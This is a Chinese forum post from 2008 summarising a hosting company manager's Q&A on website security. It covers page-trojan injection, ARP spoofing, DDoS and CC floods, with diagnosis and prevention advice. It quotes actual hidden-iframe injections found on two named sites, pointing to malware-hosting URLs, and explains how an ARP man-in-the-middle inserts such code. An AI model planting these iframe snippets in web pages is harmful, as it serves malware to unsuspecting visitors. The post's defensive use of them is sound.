本期访谈我错过了,今天来做一个整理吧。希望和我一样错过的朋友可以来这里看不用一页一页的再去找来看,这样也省下了大家很多时间,如果大家想去感受一下谈论内容的话可以去这个直播地址:
http://club.alimama.com/thread-72683-1-1.html 网网互联简介:
Quote:
网网互联是南昌网盛科技有限公司依附在淘宝平台上的一个虚拟主机运营项目,主要产品是双线虚拟主机,公司在网络攻击,WEB服务器安全方面有较多的处理经验,为众多网站提供服务器及虚拟主机,取得良好效果。
近年来网络攻击一直困绕得众多的机房与站长,解决的方案取决于快速的判断和可行性的分析。常见的DDOS,ARP,CC,以及后门入侵提权等。我们可以总结一些我们处理的经验来帮助站长们选择和处理问题。
服务器的安全 ,网站的稳定是站长最关心的话题了 1.如何检查自己的网站是否安全,除了软件以外,硬件如何检查,比如说我购买了某公司的服务器或者空间,如何检查是否安全
2.现在很多人都在用CMS,哪种CMS比较安全
3.PHP真的比ASP安全吗?
4.如果发现流量异常,被怀疑挂马,站长该如何解决?涉及到哪些操作,应用到哪些工具?
Quote:
郭总:
非常好,问题比较多,首先网站的稳定要建立在一个安全的服务器系统平台上,大部分是通过软件扫描得知服务器安全性能。现再很多主机商已经屏闭了一些网页组件扫描功能。
如果发现流量异常,被怀疑挂马,可以通过检查网页源码,进行对比.
有什么好方法快速知道别人是如何在自己的站上挂的马 通过什么途径?
Quote:
郭总:
进行网页源码对比,看是不是有<IFRAME SRC=http://*** width =1 height=1 frameborder=0></IFRAME>
这一类的代码。
如果网站被码,有没有办法找出那里出现漏洞?用什么方法能最快最有效的解决问题?
Quote:
郭总:
网页挂马有两种情况,不一定是网站出现漏洞,也有可能是ARP.
先进行源码对比,如果是源码被加上了,那肯定是漏洞,如果没有加上,有可能是服务器被ARP了.
如果服务器遭受DDOS,或者ARP,该如何操作呢?目前主流的防火墙的价位在多少,可以阻止DDOS或者ARP之类的攻击吗?最近ARP很流行,ARP欺骗 到底是什么?原理是如何的?能详细说明吗?
Quote:
郭总:
从2004年至今,我公司经常遇到DDOS这一类的攻击,这两年ARP在机房出现也比较平凡,如果遭遇DDOS攻击,那你最好的方法就是转移网站到一家有硬件防火墙的机房去。ARP就需要机房进行做VLAN对网内进行隔离,避开端口互联.
如果网站被挂马,会有哪些具体的反映呢?
Quote:
郭总:
如果网站被挂马,客户打开网站,里面肯定是多了一行代码
如果有效防止被挂?
Quote:
郭总:
网络层需要预防ARP,机房需要做VLAN隔离,服务器上安装ARP防火墙
应用层的服务器,需要为每一个网站建一个用户权限,网站的数据库做一些防下载处理,尽量避免不修改网站时,把网页模板权限打开。
原来我用asp,现在用php是不是安全多了,还要注意什么,目前用的是dz,原来的bbsxp
Quote:
郭总:
开发语言本没安全性高低之分.
不管是ASP还是PHP,这个与程序员安全意识有关
用LINUX的空间 是不是要比用WIN平台的稍微安全些呢?
Quote:
郭总:
任何操作系统都会存在漏洞,安全的对比,还是存在于服务商是否及时更新修复漏洞。
不过稳定性,linux的确要比win平台强很多。
自己不会写程序,买了一套商业版CMS,可是经常被挂马,而我有时买的虚拟空间。不知道该怎么应去预防呀?而且我的空间商也是个新手,从主机这个方面肯定做的不好,没有办法只有自己行办法,我的是aspCMS.请专家指点.
Quote:
郭总:
被挂马时,判断一下是网站漏洞还是服务器被ARP,对比一下代码
那么如何区分是网站漏洞还是ARP呢?
Quote:
郭总:
网站漏洞出现挂马的情况,你可以用FTP进去查看源码是不是多增加了一行<IFRAME SRC
如果有的话,肯定是网站漏洞被提权,添加到你的源码里的
如果没有,就是arp欺骗欺骗数据报走向,然后中间人修改一些定义的关键字.因为是网络层次有问题(所以网站是没有问题的).
上次 我的 论坛 就 打不开了空间商给停了QQ留言给我说网警查到 站里 有个帖子 有非法 内容 叫我删了,联系了下空间商 给我重新开了空间 删了 帖子 现在我也注意了很多
Quote:
郭总:
呵呵,去年底到现再非法内容查得非常紧,我们也常常处理。很多客户也有各种各样的原因联系我们
其实可以先通过ping的方式查看是否域名指向的服务器,以及服务器是否可以ping通,如果服务器是禁ping的,可以去www.114best.com/ip/查看同IP站点是否可以正常打开。
这几年大家可能常听到的一个词,网络攻击,甚至有站长接到过威胁,大家可以谈谈,然后我要以结合我们的经验教你一些处理方法。
不知道 专家能不能帮忙下 一个是http://www.zjhtjh.com一个是杭州朋友都很熟悉的 http://www.z571.com 黄龙天地的网站。
Quote:
郭总:
zjhtjh.com 我刚打开home.asp报毒,<iframe src=http://j.56c.us/v.htm
name="main2" height="0" width="91"></iframe> 两行,可是别的页面没有,
通过初步判断不是ARP,因为ARP是整台服务器所有页面报毒
,你是否可以进行FTP进服务器进行源码比对,有没有这行代码?
z571.com 顶部有<iframe src=http://c.j8j8.biz/112/ width=1 height=1></iframe>
所有页面都有,比较像ARP,能否做源码比对??
如何防挂马 Quote:
防止挂马分三部分。安全的源码,安全的虚拟主机平台,安全的网络环境
安全的源码,这里不做多的解释,因为安全的源码需要程序员对安全意识有较高的理解。
虚拟主机平台中,我觉得国内两家虚拟主机平台开发商做得比较好,swsoft以及星外。
安全的网络环境 ,主要是杜绝ARP,机房可以采用VLAN的方式进行端口隔离
下面是ARP的原理。
arp中间人攻击,实际上相当于做了一次代理。
正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A---->C---->B
B---->C---->A
实际上,C在这里做了一次代理的作用
那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如 <iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了.
如果想彻底根除挂马,你在建站的时候就必须注意两点:
1、主机商的实力:是否有足够的技术能力,及时的更新服务器的防毒、防攻击技术。(这个基本很难考察,只能选择大的主机商了)
2、如果是虚拟主机(绝大部分中小网站的选择),就要看他的主机目录是否可以单独设置访问权限(这个很重要)
原因分析:
1、挂马的方式多种多样,而且技术手段在不断的变化,这个原因就不细说了。
2、如果主机的目录可以单独设置权限,你就可以把网站程序(CMS)所在的目录设置成只读,这样即使你的普通网页被挂马了,但是由于程序未挂马。但你发现网页上挂马,可以使用CMS的全站发布功能,重新发布你的内容页,那边挂马脚本就自动被清除了。
大家只能接触得到源码,虚拟主机平台及服务器,估计大家都没有办法解决,源码在于程序员在安全方面留下的因素,所以选择一家好的虚拟主机服务商都是真正有必要的。
挂马的解决,其中虚拟主机商才是最最关键的因素,网络安全及服务器系统安全都是由虚拟主机商设置,站长们得到的不过是一个FTP上传权限和一个WEB管理界面,选择主机商关系更大。
当然安全的源码程序就需要站长们,一手审核才行。
大家有没有遇到过网络攻击,近年来出现大量的攻击小组,对站长们进行威胁,网络攻防战,大家务必要了解一些处理方法
被攻击会受到影响,攻击别人也需要付出代价,所以寻找攻击者也是非常重要的,DDOS是拒绝式攻击,最好的防护就是放到带硬防的机房里.
IIIC挂了被CC了吧,每天对方一上班我站就开始打不开,我双配置服务器竟然连页面也难打开. Quote:
郭总:CC的防御要从应用层开始解决,通过软件防火墙来实习这一点.对单个IP链接数量多少进行封IP,以及对数据包识别进行过滤
感谢各位站长各位朋友的关注, 网站安全需要站长和虚拟主机商共同搭建。
提高网站源码的安全意识,数据库防下载处理,以及一些粗心造成的程序漏洞。
选择虚拟主机时,尽量选用口碑比较好的公司。不管是大公司,还是小公司。
口碑才是最重要的,遇到了问题,客服服务在这一环节更是能体验公司诚信的关键。
希望大家能在网站出问题的时候多谅解一下主机商,多判断一下问题的所在,再寻找解决的方案,如果是主机商的问题,实在解决不了,那么只有换家公司合作。
挂马不可怕,在于用心杜绝细节问题。
幸运问题奖 金牌商人 蓝天天 cpower onions 黑木芽 松松工作室
最佳抢楼奖 dongzu 马磊 TXT下载 新疆数字
恭喜这几位了快去拿奖品吧。
[ 此贴被海风轻轻飞在2008-09-19 18:26重新编辑 ]
